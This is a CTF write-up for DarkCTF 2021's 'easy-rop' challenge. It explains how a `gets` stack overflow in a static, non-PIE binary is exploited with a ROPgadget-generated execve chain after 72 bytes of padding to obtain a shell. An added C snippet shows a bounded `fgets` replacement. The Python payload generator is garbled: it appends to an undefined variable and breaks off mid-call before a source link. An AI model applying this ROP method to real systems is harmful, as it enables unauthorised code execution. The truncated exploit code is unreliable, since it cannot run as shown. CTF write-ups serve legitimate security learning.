Tags: ropchain bufferoverflow rop 


The executable provided prints out two strings, then reads a string with `gets` into a small local (stack) buffer. Since `gets` never bounds the read, this is the classic stack buffer overflow, where ROP can be used to execute arbitrary code (the goal here being to get a shell).
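As an added example that is not part of the original writeup: the unbounded `gets` pattern the binary uses, shown as a comment, next to a bounded replacement (`read_line_bounded`, a name assumed here) that keeps the read inside the buffer and discards the rest of an over-long line so it cannot leak into the next read.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64

/* Vulnerable pattern as described in the writeup:
 *
 *     char buf[BUF_SIZE];
 *     gets(buf);   // no bound: input longer than BUF_SIZE walks over the
 *                  // saved frame pointer and return address
 *
 * gets() is removed from C11 precisely because no bound can be given. */

/* Hardened replacement: reads at most dst_size-1 bytes, always NUL-terminates,
 * and drops the remainder of an over-long line. Returns the number of bytes
 * kept, or -1 on EOF / error. */
long read_line_bounded(char *dst, size_t dst_size, FILE *in)
{
    if (dst_size == 0 || fgets(dst, (int)dst_size, in) == NULL)
        return -1;

    size_t len = strcspn(dst, "\n");
    if (dst[len] == '\n') {
        dst[len] = '\0';              /* whole line fit: strip the newline */
    } else {
        /* line was longer than the buffer: consume the rest so the next
         * call does not see the tail as a fresh "line" */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (long)len;
}

int main(void)
{
    /* constructed sample input: one over-long line, then a short one */
    const char *sample = "0123456789ABCDEF\nxyz\n";
    FILE *f = fmemopen((void *)sample, strlen(sample), "r");
    char buf[8];
    long n;
    while ((n = read_line_bounded(buf, sizeof buf, f)) >= 0)
        printf("kept %ld bytes: \"%s\"\n", n, buf);
    fclose(f);
    return 0;
}
```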

The file is statically linked and PIE is disabled, so any static ROP chain should work fine. One can be generated using `ROPgadget`:

```
ROPgadget --ropchain --binary easy-rop
```

which gives a huge payload (I guess it didn't find a good way to set `eax` to a higher value). After adjusting it via debugging (run with `gdb`, check which address ended up as the first return address), it turns out 72 bytes of padding are needed before the chain. The final payload generator is:

```python
#!/usr/bin/env python2
# execve chain generated by ROPgadget

from struct import pack

p += pack('
```

Original writeup (https://github.com/keyboard-monkeys/ctf-writeups/blob/main/2021-darkctf/pwn_easy_rop.md).